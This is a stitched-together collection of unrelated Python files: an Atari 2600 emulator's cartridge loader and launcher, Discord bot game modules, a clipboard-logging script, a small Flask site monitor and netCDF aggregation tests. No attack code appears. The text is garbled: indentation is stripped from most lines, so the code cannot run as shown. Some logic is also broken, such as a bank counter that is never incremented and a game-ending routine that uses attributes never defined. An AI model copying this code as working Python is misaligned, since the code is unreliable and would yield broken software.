self.bank_size = bank_size
self.cartridge_bank = []
self.num_banks = 0
self._load_cartridge(file_name)
def get_save_state(self):
state = {}
state['file_name'] = self._file_name
return state
def set_save_state(self, state):
self._file_name = state['file_name']
def get_absolute_address(self, address):
return (address & 0xFFF)
def read(self, address):
return self.cartridge_bank[address & 0xFFF]
def write(self, address, data):
pass
def _load_cartridge(self, filename):
total_bytes_read = 0
print("Opening:", filename)
with open(filename, 'rb') as rom_file:
self.max_cartridge = []
full = rom_file.read()
for bank in self._chunks(full, self.bank_size):
bytes_read = len(bank)
if (bytes_read > 0) and (bytes_read < self.bank_size):
# If the bank is short, pad it with zeros.
                    bank += bytearray('\000'.encode() * (self.bank_size-bytes_read))
                    # If the read size was less than a half bank, copy the
                    # shortfall.
                    if bytes_read <= int(self.bank_size/2):
                        bank = bank[0:int(self.bank_size/2)] + bank[0:int(self.bank_size/2)]
                        self.max_cartridge = bank[0:int(self.bank_size/2)] + bank[0:int(self.bank_size/2)]
self.max_cartridge = bytearray(bank)
total_bytes_read += bytes_read
self.cartridge_bank = []
self.cartridge_bank = self.max_cartridge
print("Cartridge read:")
print(" banks = ", self.num_banks)
print(" bytes = ", total_bytes_read)
print(" first bank size = ", len(self.cartridge_bank))
def _chunks(self, l, n):
for i in range(0, len(l), n):
yield l[i:i+n]
class GenericCartridge(object):
def __init__(self, file_name, max_banks, bank_size, hot_swap, ram_size):
self.max_banks = max_banks
self.bank_size = bank_size
self.hot_swap = hot_swap
self.ram_size = ram_size
self.ram_addr_mask = 0xFFFF & (self.ram_size - 1)
self.cartridge_banks = [[]] * self.max_banks
self.ram = []
self.num_banks = 0
self.current_bank = 0
self.bank_select = 0
self._file_name = file_name
self._load_cartridge(file_name)
def get_save_state(self):
state = {}
state['ram'] = list(self.ram)
state['current_bank'] = self.current_bank
state['file_name'] = self._file_name
return state
def set_save_state(self, state):
self.ram = list(state['ram'])
self.current_bank = state['current_bank']
self._file_name = state['file_name']
def get_absolute_address(self, address):
return self.bank_size * self.current_bank + (address & 0xFFF)
def read(self, address):
address = address & 0xFFF
if (self.ram_size > 0) and (address < 2*self.ram_size) and (address >= self.ram_size):
data = self.ram[address & self.ram_addr_mask]
else:
# 0xFF8 == address: Last bank - 2
# 0xFF9 == address: Last bank - 1
# 0xFFA == address: Last bank
if (((self.hot_swap +1) - self.num_banks) <= address) and ((self.hot_swap+1) > address):
self.current_bank = self.num_banks - ((self.hot_swap+1) - address)
data = self.cartridge_banks[self.current_bank][address]
return data
def write(self, address, data):
address = address & 0xFFF
if (self.ram_size > 0) and (address < self.ram_size):
self.ram[address & self.ram_addr_mask] = data
if (((self.hot_swap+1) - self.num_banks) <= address) and ((self.hot_swap+1) > address):
self.current_bank = self.num_banks - ((self.hot_swap+1) - address)
def _load_cartridge(self, filename):
total_bytes_read = 0
print("Opening:", filename)
with open(filename, 'rb') as rom_file:
if (self.ram_size > 0):
self.ram = [0] * self.ram_size
self.max_cartridge = [[]] * self.max_banks
full = rom_file.read()
for bank in self._chunks(full, self.bank_size):
bytes_read = len(bank)
if (bytes_read > 0) and (bytes_read < self.bank_size):
# If the bank is short, pad it with zeros.
bank += bytearray('\000'.encode() * (self.bank_size-bytes_read))
# If the read size was less than a half bank, copy the
# shortfall.
if bytes_read <= int(self.bank_size/2):
bank = bank[0:int(self.bank_size/2)] + bank[0:int(self.bank_size/2)]
self.max_cartridge[self.num_banks] = bank[0:int(self.bank_size/2)] + bank[0:int(self.bank_size/2)]
self.max_cartridge[self.num_banks] = bytearray(bank)
self.num_banks += 1
total_bytes_read += bytes_read
self.cartridge_banks = [[]] * self.num_banks
for i in range(self.num_banks):
self.cartridge_banks[i] = self.max_cartridge[i]
# Set default bank to the last bank.
self.current_bank = 0
print("Cartridge read:")
print(" banks = ", self.num_banks)
print(" bytes = ", total_bytes_read)
print(" first bank size = ", len(self.cartridge_banks[0]))
def _chunks(self, l, n):
for i in range(0, len(l), n):
yield l[i:i+n]
if __name__ == '__main__':
import sys
new_generic_cart = GenericCartridge(sys.argv[1], 4, 0x1000, 0xFF9, 0x0)
print(new_generic_cart.read(0), new_generic_cart.read(1))
new_pb_cart = PBCartridge(sys.argv[1])
print(new_pb_cart.read(0), new_pb_cart.read(1))
```
#### File: emulator/pytari2600/profile.py
```python
import cProfile
import pytari2600
import argparse
import pstats
class Args(object):
def __init__(self):
pass
parser = argparse.ArgumentParser(description='Profile emulator')
parser.add_argument('-r', dest='rerun', action='store_true', default=False)
parser.add_argument('-t', dest='tottime', action='store_true', default=False)
parser.add_argument('-c', dest='cumulative', action='store_true', default=False)
cmd_args = parser.parse_args()
if cmd_args.rerun:
pytari_args = Args()
pytari_args.cart_type='default'
# pytari_args.cart_type='single_bank'
pytari_args.cartridge_name='../atari2600/roms/Pitfall!.bin'
pytari_args.debug=False
pytari_args.no_delay=False
pytari_args.stop_clock=4000000
pytari_args.replay_file=None
pytari_args.graphics_driver='pygame'
pytari_args.audio_driver='tia_dummy'
pytari_args.cpu_driver='cpu_gen'
cProfile.run('pytari2600.run(pytari_args)','profile.stats')
p = pstats.Stats('profile.stats')
if cmd_args.cumulative:
p.sort_stats('cumulative').print_stats()
if cmd_args.tottime:
p.sort_stats('tottime').print_stats()
```
#### File: emulator/pytari2600/pytari2600.py
```python
import argparse
from . import atari2600
from .audio.tiasound import TIA_Sound as AudioDriver
from .graphics.pygamestella import PygameStella as Graphics
from . import cpu_gen as cpu
def config(graphics_selection, audio_selection, cpu_selection):
# Use some questionable code to perform driver selection.
# Imports only occur 'on-demand' so missing dependencies cause issues
# unless you attempt to use them.
exec_locals= {}
exec(audio_options[audio_selection], {}, exec_locals)
exec(graphics_options[graphics_selection], {}, exec_locals)
exec(cpu_options[cpu_selection], {}, exec_locals)
return (exec_locals['Graphics'],
exec_locals['AudioDriver'],
exec_locals['cpu'])
def new_atari(cartridge, cart_type="default", headless=False):
atari = atari2600.Atari(Graphics, AudioDriver, cpu, headless)
atari.insert_cartridge(cartridge, cart_type)
atari.prepare()
return atari
def run(args):
atari = atari2600.Atari(Graphics, AudioDriver, cpu)
atari.insert_cartridge(args.cartridge_name, args.cart_type)
atari.power_on(args.stop_clock, args.no_delay, args.debug, args.replay_file)
def main():
parser = argparse.ArgumentParser(description='ATARI emulator')
parser.add_argument('cartridge_name', action='store')
parser.add_argument('-d', dest='debug', action='store_true')
parser.add_argument('-r', '--replay_file', dest='replay_file', type=str,
help="Json file to save/restore state. Triggered via '[',']' keys")
parser.add_argument('-s', dest='stop_clock', type=int, default=0,
help="Set a clock time to stop (useful for profiling), setting to '0' is disable stop")
parser.add_argument('-c', dest='cart_type',
choices=['default', 'pb', 'mnet', 'cbs',
'e', 'fe','super','f4', 'single_bank'],
default='default',
help="Select the cartridge type of the rom being run (default is for 'common' bankswitching)")
parser.add_argument('-g', dest='graphics_driver',
choices=graphics_options.keys(),
default='pygame',
help="Select an alternate to graphics module")
parser.add_argument('--cpu', dest='cpu_driver',
choices=cpu_options.keys(),
default='cpu_gen',
help="Select an alternate CPU emulation, primarily to allow trying different optimisations.")
parser.add_argument('-a', dest='audio_driver',
choices=audio_options.keys(),
default='tia_dummy',
help="Select an alternate CPU emulation, primarily to allow trying different optimisations.")
parser.add_argument('-n', dest='no_delay', action='store_true',
help="Wishful flag for when the emulator runs too fast.")
args = parser.parse_args()
print(args)
run(args)
if __name__=='__main__':
main()
```
#### File: modules/games/cog.py
```python
from typing import Union
# from .chess import *
# from .connectfour import *
# from .hangman import *
# from .quiz import *
# from .tictactoe import *
from .uno import *
from .util.game import *
class Games(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.games = {}
@commands.command(name="uno")
async def uno(self, ctx):
if ctx.channel in self.games:
await ctx.send("There is already an UNO game in this channel.")
else:
game = Uno(ctx.channel, [ctx.author])
self.games[ctx.channel] = game
await game.init()
def setup(bot):
bot.add_cog(Games(bot))
```
#### File: modules/games/mafia.py
```python
import asyncio
import math
import random
from modules.games.util.game import Game
ROLE_MAFIA = 0
ROLE_DOCTOR = 1
ROLE_DETECTIVE = 2
ROLE_CITIZEN = 3
async def prompt_user(bot, user, text, callback, message_check=None):
dm = await user.create_dm()
prompt = await dm.send(text)
if message_check is None:
def message_check(m):
return m.author == user
try:
msg = await bot.wait_for("message", check=message_check, timeout=30.0)
await callback(prompt, msg)
except asyncio.TimeoutError:
await dm.send("Took too long.")
return
async def prompt_mafia(bot, user, text, callback):
def message_check(m):
return m.author == user and m.content.isnumeric()
await prompt_user(bot, user, text, callback, message_check)
class Mafia(Game):
min_players = 4
max_players = 10
name = "Mafia"
def __init__(self, handler, channel, players):
super().__init__(handler, channel, players)
self.roles = {}
self.day = 1
def get_display(self):
return str(self.players)
async def start(self):
await super().start()
mafia_count = math.floor(len(self.players)/3)
doctor_count = 1
detective_count = 1
citizen_count = len(self.players) - mafia_count - doctor_count - detective_count
roles = [ROLE_MAFIA] * mafia_count + [ROLE_DOCTOR] * doctor_count \
+ [ROLE_DETECTIVE] * detective_count + [ROLE_CITIZEN] * citizen_count
random.shuffle(roles)
self.roles = {player: 0 for player in self.players}
for i in range(len(self.players)):
self.roles[self.players[i]] = roles[i]
await self.send(self.roles)
async def night(self):
to_kill = []
async def mafia_callback(prompt, msg):
pass
async def doctor_callback(prompt, msg):
pass
async def detective_callback(prompt, msg):
pass
for player in self.players:
if self.roles[player] == ROLE_MAFIA:
await prompt_mafia(self.handler.bot, player, "Choose a player to kill:", mafia_callback)
elif self.roles[player] == ROLE_DOCTOR:
await prompt_mafia(self.handler.bot, player, "Choose a player to save:", doctor_callback)
elif self.roles[player] == ROLE_DETECTIVE:
await prompt_mafia(self.handler.bot, player, "Choose a player to investigate:", detective_callback)
async def on_message(self, message):
pass
async def display(self):
await self.send(self.get_display())
async def end(self):
await super().end()
sorted_scores = sorted(self.points.items(), key=lambda kv: kv[1])
if max(self.lives.values()) <= 0:
await self.send(f"The creator of the game ({self.owner.mention}) won as nobody guessed the phrase.")
else:
self.winner = sorted_scores[0][0]
# self.handler.add_tokens(self.channel.guild, self.winner.id, 10)
await self.send(f"Winner: {self.winner.mention} ({sorted_scores[0][1]} points).")
```
#### File: modules/games/tictactoe.py
```python
from modules.games.util.game import TurnBasedGame, Rules, DEFAULT_GAME_TOKENS
TTT_TILES = [["🇦", "🇧", "🇨"],
["🇩", "🇪", "🇫"],
["🇬", "🇭", "🇮"]]
class TicTacToeRules(Rules):
keys = ["scuffed"]
def __init__(self):
super().__init__()
self._scuffed = False
@property
def scuffed(self):
return self._scuffed
@scuffed.setter
def scuffed(self, value):
if value not in ["true", "false"]:
raise ValueError("Invalid value (must be true or false)")
self._scuffed = value == "true"
class TicTacToe(TurnBasedGame):
min_players = 2
max_players = 2
name = "Tic-Tac-Toe"
def __init__(self, handler, channel, players):
super().__init__(handler, channel, players)
self.rules = TicTacToeRules()
self.board = list()
self.player_icons = DEFAULT_GAME_TOKENS
async def start(self):
self.board = [[0 for _ in range(3)] for _ in range(3)]
self.player_icons = [self.handler.bot.user_config.get(self.players[i].id, "game-emote") or self.player_icons[i]
for i in range(len(self.players))]
await super().start()
await self.display()
def check_win(self):
a, b, c = self.board[0]
d, e, f = self.board[1]
g, h, i = self.board[2]
win_conditions = [(a, b, c), (d, e, f), (g, h, i), (a, d, g),
(b, e, h), (c, f, i), (a, e, i), (c, e, g)]
for condition in win_conditions:
if condition[0] != 0 and len(set(condition)) == 1:
return condition[0]
return 0
def get_board(self):
msg = str()
for y in range(3):
for x in range(3):
cell = self.board[y][x]
if cell == 0:
msg += TTT_TILES[y][x]
elif cell == 1:
msg += self.player_icons[0]
elif cell == 2:
msg += self.player_icons[1]
msg += "\u200b"
msg += "\n"
return msg
def get_key(self):
return f"{self.player_icons[0]} **{self.players[0].name}** {self.player_icons[1]} **{self.players[1].name}**"
def get_display(self):
return f"It is currently **{self.get_turn().name}'s** turn.\n" + self.get_board() + "\n" + self.get_key()
async def display(self):
await self.send(self.get_display())
async def play_token(self, player, x, y):
await self.reset_timeout()
if self.board[y][x] != 0:
return
self.board[y][x] = self.turn + 1
win = self.check_win()
if win > 0:
self.winner = self.players[win-1]
await self.end()
return
if not any(0 in row for row in self.board):
await self.end()
return
self.turn += 1
self.turn %= len(self.players)
await self.send(f"**{player.name}** played a token in position {'ABCDEFGHI'[3*y+x]}.\n"
f"It is now **" + self.get_turn().name + "'s** turn.\n\n"
+ self.get_board() + "\n" + self.get_key())
async def on_message(self, message):
if message.author not in self.players:
return
if message.author != self.get_turn() and not self.rules.scuffed:
return
move = message.content.lower()
if move not in "abcdefghi":
return
i = "abcdefghi".index(move)
move_x, move_y = i % 3, i // 3
await self.play_token(message.author, move_x, move_y)
async def end(self):
await super().end()
if self.winner is None:
await self.send("There was a tie and nobody received points.\n\n" + self.get_board())
else:
# self.handler.add_tokens(self.channel.guild, self.winner.id, 5)
await self.send(f"Winner: **{self.winner.name}**\n\n" + self.get_board())
```
#### File: games/util/game.py
```python
from typing import Union
import discord
from discord.ext import commands
DEFAULT_GAME_TOKENS = ["\N{LARGE RED CIRCLE}",
"\N{LARGE BLUE CIRCLE}",
chr(0x1f7e2),
chr(0x1f7e1),
"\N{RADIO BUTTON}"]
class GameCheckFailure(commands.CheckFailure):
def __init__(self, gametype, message=None):
super().__init__(message)
self.gametype = gametype
class Rules:
keys = []
def __init__(self):
pass
class LobbyView(discord.ui.View):
def __init__(self, game, *args, **kwargs):
super().__init__(*args, **kwargs)
self.game = game
@discord.ui.button(label="Join/Leave", style=discord.ButtonStyle.red)
async def joinleave(self, button, interaction):
player = interaction.user
if player in self.game.players:
await self.game.remove_player(player)
else:
await self.game.add_player(player)
self.game.embed.description = "\n".join(str(player) for player in self.game.players)
await self.game.update_message()
@discord.ui.button(label="Start", style=discord.ButtonStyle.green)
async def start(self, button, interaction):
if interaction.user != self.game.owner:
return
await self.game.start()
class Game:
min_players = 1
max_players = 5
timeout_time = 600
# timeout_time_lobby = 1200
name = "Null"
def __init__(self, channel, players):
self.rules = Rules()
self.channel = channel
self.players = players
self.owner = players[0]
self.winner = None
self.playing = False
self.message = None
self.embed = None
self.view = LobbyView(self)
async def init(self):
self.embed = discord.Embed(title=f"{self.name} Game")
self.message = await self.channel.send(embed=self.embed, view=self.view)
async def remove_player(self, player):
if player not in self.players:
return
self.players.remove(player)
if len(self.players) == 0:
pass
# remove game
elif len(self.players) == 1 and self.playing:
self.winner = self.players[0]
await self.end()
else:
if player == self.owner:
self.owner = self.players[0]
await self.update_message()
async def add_player(self, player):
if player in self.players:
return
self.players.append(player)
async def start(self):
self.playing = True
async def on_message(self, message):
pass
async def end(self):
self.handler.remove_game(self)
async def update_message(self):
await self.message.edit(embed=self.embed, view=self.view)
class TurnBasedGame(Game):
min_players = 2
max_players = 5
def __init__(self, channel, players):
super().__init__(channel, players)
self.turn = 0
self.is_reversed = False
def next_turn(self):
if self.is_reversed:
self.turn -= 1
else:
self.turn += 1
self.turn %= len(self.players)
def get_turn(self, offset=0):
turn = (self.turn + offset * (-1 if self.is_reversed else 1)) % len(self.players)
return self.players[turn]
"""
async def play(self, message):
await super().play(message)
if message.author != self.players[self.turn]:
return
self.turn += 1
self.turn %= len(self.players)
await self.on_turn(self.players[self.turn])
"""
async def on_turn(self, player):
await self.channel.send(f"It is now **{player.name}'s** turn.")
class RoundBasedGame(Game):
def __init__(self, channel, players):
super().__init__(channel, players)
self.round = 0
self.players_done = []
async def check_round_end(self):
if len(self.players_done) == len(self.players):
self.players_done = []
self.round += 1
await self.on_round()
async def remove_player(self, player):
await super().remove_player(player)
if player in self.players_done:
self.players_done.remove(player)
async def on_player_finish(self, player):
if player not in self.players_done:
self.players_done.append(player)
await self.check_round_end()
async def on_round(self):
pass
``` |
{
"source": "5StevenWu/capacityAnalyse",
"score": 3
} |
#### File: capacityAnalyse/clipfolder/comexam2.py
```python
import pyperclip
import time
# Stable version that does not throw errors
class niubi():
def lihai(self):
while True:
# jianting().main()
t = jianting().main()
print(t)
with open('clip25.txt', 'a', encoding='utf-8') as file_obj:
file_obj.write(t)
file_obj.write('\n')
class jianting():
def clipboard_get(self):
"""获取剪贴板数据"""
data = pyperclip.paste() # 主要这里差别
return data
def main(self):
"""后台脚本:每隔0.2秒,读取剪切板文本,检查有无指定字符或字符串,如果有则执行替换"""
# recent_txt 存放最近一次剪切板文本,初始化值只多执行一次paste函数读取和替换
recent_txt = self.clipboard_get()
while True:
# txt 存放当前剪切板文本
txt = self.clipboard_get()
# 剪切板内容和上一次对比如有变动,再进行内容判断,判断后如果发现有指定字符在其中的话,再执行替换
if txt != recent_txt:
# print(f'txt:{txt}')
recent_txt = txt # 没查到要替换的子串,返回None
return recent_txt
# 检测间隔(延迟0.2秒)
time.sleep(0.02)
if __name__ == '__main__':
niubi().lihai()
```
#### File: capacityAnalyse/kanban/data7.py
```python
from datetime import datetime, timedelta
def day7(rightday):
lastsunday = (rightday + timedelta(days=-8)).strftime("%Y-%m-%d")
monday = (rightday + timedelta(days=-7)).strftime("%Y-%m-%d")
tuesday = (rightday + timedelta(days=-6)).strftime("%Y-%m-%d")
wednesday = (rightday + timedelta(days=-5)).strftime("%Y-%m-%d")
thursday = (rightday + timedelta(days=-4)).strftime("%Y-%m-%d")
friday = (rightday + timedelta(days=-3)).strftime("%Y-%m-%d")
saturday = (rightday + timedelta(days=-2)).strftime("%Y-%m-%d")
sunday = (rightday + timedelta(days=-1)).strftime("%Y-%m-%d")
week = [lastsunday, monday, tuesday, wednesday, thursday, friday, saturday, sunday]
print(week)
return week
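
# Minimal usage sketch (illustrative date, not part of the original file):
if __name__ == '__main__':
    print(day7(datetime(2021, 3, 15)))
    # -> ['2021-03-07', '2021-03-08', ..., '2021-03-14']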
``` |
{
"source": "5StevenWu/wemonitor",
"score": 2
} |
#### File: sendmail/flaskmail110/monitor.py
```python
from flask import Flask, request
import requests
import re
from send2alimail import sendmail
import time
app = Flask(__name__)
@app.route('/')
def index():
return 'mail110'
@app.route('/mail')
def mail():
return '发送邮件报警'
def passimsa():
response = requests.get('http://www.imsa.cn')
# response = requests.get('http://cca.imsa.cn')
pagetext = response.text
title = '中国国际象棋协会综合服务管理平台'
res = re.search(title, pagetext)
if res:
        requests.get('http://127.0.0.1:5000')
if __name__ == '__main__':
# app.run(debug=True)
while True:
passimsa()
time.sleep(300)
```
#### File: sendmail/flaskmail110/read_config.py
```python
import os
import json
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
def loadConf():
with open('wechatConf.zqconfig', 'r') as wechatConf:
settings = json.load(wechatConf)
# corpid = settings['corpid']
# corpsecret = settings['corpsecret']
passwd=settings["passwd"]
return passwd
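
# Assumed shape of wechatConf.zqconfig (illustrative; inferred from the keys read above):
# {"passwd": "<mail password>", "corpid": "<wechat corp id>", "corpsecret": "<wechat corp secret>"}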
if __name__ == '__main__':
test = loadConf()
print(test)
``` |
{
"source": "5t111111/slack-post.nvim",
"score": 3
} |
#### File: rplugin/python3/slack_post.py
```python
import neovim
from slackclient import SlackClient
@neovim.plugin
class SlackPost(object):
"""
the following global var should be set in Neovim configuration
- g:slack_api_token : slack api token
- g:slack_channel_to_post : slack channel you want to post to
- g:slack_username : slack username (optional)
- g:slack_icon_emoji : slack emoji for icon (optional)
"""
def __init__(self, nvim):
self.nvim = nvim
self.text = None
@neovim.command("PostTextToSlack", range='')
def post_text_to_slack(self, range):
b = self.nvim.current.buffer
lines = b[(range[0]-1):range[1]]
self.text = "\n".join(lines)
return self.__execute_posting()
@neovim.command("PostCodeToSlack", range='')
def post_code_to_slack(self, range):
b = self.nvim.current.buffer
lines = b[(range[0]-1):range[1]]
lines.insert(0, '```')
lines.append('```')
self.text = "\n".join(lines)
return self.__execute_posting()
def __execute_posting(self):
token = self.__get_vim_global_var_safely('slack_api_token')
if token is None:
return False
channel = self.__get_vim_global_var_safely('slack_channel_to_post')
if channel is None:
return False
username = self.__get_vim_global_var_safely('slack_username')
if username is None:
username = 'Nvim Bot'
icon_emoji = self.__get_vim_global_var_safely('slack_icon_emoji')
if icon_emoji is None:
icon_emoji = ':robot_face:'
self.nvim.command(':let choice = confirm("Are you sure you want to post the selected lines to Slack?", "y Yes\nn No\n")')
answer = self.nvim.eval('choice')
if answer == 1:
sc = SlackClient(token)
sc.api_call(
'chat.postMessage',
channel=channel,
text=self.text,
username=username,
icon_emoji=icon_emoji
)
self.nvim.command('echo "Posted!"')
return True
else:
self.nvim.command('echo "Canceled"')
return False
def __get_vim_global_var_safely(self, var_name):
self.nvim.command(':let g:{var_name!s} = get(g:, "{var_name!s}", "")'.format(**locals()))
value = self.nvim.eval('g:{var_name!s}'.format(**locals()))
if not value:
self.nvim.err_write("g:{var_name!s} is not set\n".format(**locals()))
return None
return value
``` |
{
"source": "5tarlight/ai-blink",
"score": 3
} |
#### File: 5tarlight/ai-blink/blink.py
```python
import cv2
import dlib
import math
import time
import webbrowser
import os
# from playsound import playsound
BLINK_RATIO_THRESHOLD = 5.7
#-----Step 5: Getting to know blink ratio
def midpoint(point1 ,point2):
return (point1.x + point2.x)/2,(point1.y + point2.y)/2
def euclidean_distance(point1 , point2):
return math.sqrt((point1[0] - point2[0])**2 + (point1[1] - point2[1])**2)
def get_blink_ratio(eye_points, facial_landmarks):
#loading all the required points
corner_left = (facial_landmarks.part(eye_points[0]).x,
facial_landmarks.part(eye_points[0]).y)
corner_right = (facial_landmarks.part(eye_points[3]).x,
facial_landmarks.part(eye_points[3]).y)
center_top = midpoint(facial_landmarks.part(eye_points[1]),
facial_landmarks.part(eye_points[2]))
center_bottom = midpoint(facial_landmarks.part(eye_points[5]),
facial_landmarks.part(eye_points[4]))
#calculating distance
horizontal_length = euclidean_distance(corner_left,corner_right)
vertical_length = euclidean_distance(center_top,center_bottom)
    # guard against division by zero when the eyelid midpoints coincide (eye fully closed)
    if vertical_length == 0:
        ratio = 1
    else:
        ratio = horizontal_length / vertical_length
return ratio
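
# Worked example (illustrative numbers): if the eye corners are 60 px apart and the eyelid
# midpoints are 10 px apart, the ratio is 60 / 10 = 6.0, which exceeds
# BLINK_RATIO_THRESHOLD (5.7) and is therefore counted as a blink.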
#livestream from the webcam
cap = cv2.VideoCapture(0)
'''in case of a video
cap = cv2.VideoCapture("__path_of_the_video__")'''
#name of the display window in openCV
cv2.namedWindow('BlinkDetector')
#-----Step 3: Face detection with dlib-----
detector = dlib.get_frontal_face_detector()
#-----Step 4: Detecting Eyes using landmarks in dlib-----
predictor = dlib.shape_predictor("shape_predictor_68_face_landmarks.dat")
#these landmarks are based on the image above
left_eye_landmarks = [36, 37, 38, 39, 40, 41]
right_eye_landmarks = [42, 43, 44, 45, 46, 47]
duration = 0
blink = 0
while True:
start = time.time()
#capturing frame
retval, frame = cap.read()
#exit the application if frame not found
if not retval:
print("Can't receive frame (stream end?). Exiting ...")
break
#-----Step 2: converting image to grayscale-----
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#-----Step 3: Face detection with dlib-----
#detecting faces in the frame
faces,_,_ = detector.run(image = frame, upsample_num_times = 0, adjust_threshold = 0.0)
faceCount = len(faces)
#-----Step 4: Detecting Eyes using landmarks in dlib-----
for face in faces:
landmarks = predictor(frame, face)
#-----Step 5: Calculating blink ratio for one eye-----
left_eye_ratio = get_blink_ratio(left_eye_landmarks, landmarks)
right_eye_ratio = get_blink_ratio(right_eye_landmarks, landmarks)
blink_ratio = (left_eye_ratio + right_eye_ratio) / 2
if blink_ratio > BLINK_RATIO_THRESHOLD:
#Blink detected! Do Something!
cv2.putText(frame,"BLINKING",(10,50), cv2.FONT_HERSHEY_SIMPLEX,
2,(255,255,255),2,cv2.LINE_AA)
print('blink!')
blink += duration
else:
if blink > 0:
blink -= duration
else:
blink = 0
duration = (time.time() - start)
print(faceCount, duration, blink)
if blink >= 2:
print('Sleeping!!!!')
cv2.putText(frame,"SLEEPING",(10,120), cv2.FONT_HERSHEY_SIMPLEX,
2,(255,255,255),2,cv2.LINE_AA)
print('\a')
blink = 0
# webbrowser.open('file://{}/index.html'.format(os.path.abspath(os.getcwd())))
# time.sleep(1)
cv2.imshow('BlinkDetector', frame)
key = cv2.waitKey(1)
if key == 27:
break
#releasing the VideoCapture object
cap.release()
cv2.destroyAllWindows()
``` |
{
"source": "5tefan/ncagg",
"score": 2
} |
#### File: exis/EXISL1bSFEU_remapping/type1_test.py
```python
import unittest
import tempfile
import netCDF4 as nc
from ncagg.config import Config
from ncagg.aggregator import generate_aggregation_list, evaluate_aggregation_list
from datetime import datetime
import glob
import os
import numpy as np
import json
class TestEuvs(unittest.TestCase):
def setUp(self):
# tmp file to aggregate to
_, self.nc_out_filename = tempfile.mkstemp()
pwd = os.path.dirname(__file__)
self.files = sorted(glob.glob(os.path.join(pwd, "data", "type1", "*.nc")))
with open(os.path.join(pwd, "type1_config.json")) as config_in:
self.config = Config.from_dict(json.load(config_in))
def tearDown(self):
os.remove(self.nc_out_filename)
def test_basic(self):
""" Ok, so the files in data/type1/ don't have an unlimited dimension, report_number should be
unlimited so I've made report_nubmer unlimited in the config template type1_config.json.
Let's see if we can aggregate to it. """
aggregation_list = generate_aggregation_list(self.config, self.files)
self.assertEqual(len(aggregation_list), 3)
evaluate_aggregation_list(self.config, aggregation_list, self.nc_out_filename)
with nc.Dataset(self.nc_out_filename) as nc_out: # type: nc.Dataset
time = nc_out.variables["time"][:]
self.assertEqual(len(time), 3)
self.assertTrue(nc_out.dimensions["report_number"].isunlimited())
# perffffect
```
#### File: test/generic/test_attribute_strategies.py
```python
import unittest
from datetime import datetime
import tempfile
import netCDF4 as nc
import os
from ncagg.attributes import (
StratFirst,
StratLast,
StratUniqueList,
StratIntSum,
StratFloatSum,
StratAssertConst,
)
from ncagg.attributes import (
StratDateCreated,
StratStatic,
StratTimeCoverageStart,
StratTimeCoverageEnd,
)
from ncagg.attributes import (
StartFirstInputFilename,
StartLastInputFilename,
StratCountInputFiles,
)
from ncagg import Config
from ncagg.attributes import datetime_format
test_dir = os.path.dirname(os.path.realpath(__file__))
test_input_file = os.path.join(
test_dir,
"data/OR_MAG-L1b-GEOF_G16_s20170431500000_e20170431500599_c20170431501005.nc",
)
class TestAttributeStrategies(unittest.TestCase):
def setUp(self):
        # having "second" twice is on purpose, to test the unique-list strategy
self.mock_str_attributes = ["first", "second", "second", "third"]
self.mock_int_attributes = [1, 2, 2, 3]
self.mock_float_attributes = [1.1, 2.2, 2.3, 3.3]
self.test_nc = nc.Dataset(test_input_file)
self.handler_kwargs = {"config": Config.from_nc(test_input_file)}
def test_strat_first_gives_first(self):
process, finalize = StratFirst.setup_handler(**self.handler_kwargs)
for attr in self.mock_str_attributes:
process(attr)
self.assertEqual(finalize(self.test_nc), "first")
def test_strat_last_gives_last(self):
process, finalize = StratLast.setup_handler(**self.handler_kwargs)
for attr in self.mock_str_attributes:
process(attr)
self.assertEqual(finalize(self.test_nc), "third")
def test_strat_unique_list(self):
process, finalize = StratUniqueList.setup_handler(**self.handler_kwargs)
for attr in self.mock_str_attributes:
process(attr)
self.assertEqual(finalize(self.test_nc), "first, second, third")
def test_int_sum(self):
process, finalize = StratIntSum.setup_handler(**self.handler_kwargs)
for attr in self.mock_int_attributes:
process(attr)
self.assertEqual(finalize(self.test_nc), sum(self.mock_int_attributes))
def test_float_sum(self):
process, finalize = StratFloatSum.setup_handler(**self.handler_kwargs)
for attr in self.mock_float_attributes:
process(attr)
self.assertEqual(finalize(self.test_nc), sum(self.mock_float_attributes))
def test_assert_const_fails_nonconst(self):
process, finalize = StratAssertConst.setup_handler(**self.handler_kwargs)
with self.assertRaises(AssertionError):
for attr in self.mock_str_attributes:
process(attr)
self.assertEqual(finalize(self.test_nc), "first")
def test_assert_const_pass_consts(self):
process, finalize = StratAssertConst.setup_handler(**self.handler_kwargs)
for attr in ["const", "const", "const"]:
process(attr)
self.assertEqual(finalize(self.test_nc), "const")
def test_date_created_close(self):
process, finalize = StratDateCreated.setup_handler(**self.handler_kwargs)
for attr in self.mock_str_attributes:
process(attr)
# since both of these date time strings may not be created exactly at the same time,
# only check to make sure they are mostly the same, it's ok if there is some difference
# in the last milliseconds piece.
self.assertEqual(
finalize(self.test_nc)[:-3], datetime_format(datetime.now())[:-3]
)
def test_strat_first_filename(self):
process, finalize = StartFirstInputFilename.setup_handler(**self.handler_kwargs)
process("test", self.test_nc)
self.assertIn(".nc", finalize(self.test_nc))
def test_strat_static(self):
# set the config for a static "license" attribute...
value = "Hello world"
self.handler_kwargs["config"].attrs["license"] = {
"name": "license",
"strategy": "static",
"value": value,
}
process, finalize = StratStatic.setup_handler(
name="license", **self.handler_kwargs
)
process("test", self.test_nc)
self.assertEqual(value, finalize(self.test_nc))
```
#### File: test/generic/test_config_objects.py
```python
import unittest
from ncagg.config import ConfigDict
from ncagg.config import DimensionConfig, VariableConfig, GlobalAttributeConfig
from ncagg.config import Config
class SampleConfig(ConfigDict):
""" A very basic config that expect fields with a something float value,
in order to test that basic functionality works as expected. """
def get_item_schema(self):
default = super(SampleConfig, self).get_item_schema()
default.update({"something": {"type": "float"}})
return default
class TestConfigDict(unittest.TestCase):
def test_init_valid(self):
""" Make sure that a valid configuration is accepted and ordering
preserved. """
a = SampleConfig(
[
{"name": "a", "something": 1},
{"name": "b", "something": 2},
{"name": "z", "something": 1},
]
)
for i, k in enumerate(a.keys()):
# check ordering
self.assertEqual(["a", "b", "z"][i], k)
def test_init_invalid(self):
""" Ensure that the sample config rejects the bad string value
since something is expected to be a float value. """
with self.assertRaises(ValueError):
SampleConfig(
[
{"name": "a", "something": 1},
{"name": "b", "something": "noooo"},
{"name": "z", "something": 1},
]
)
def test_update(self):
""" Test that we can't insert invalid values through update either. """
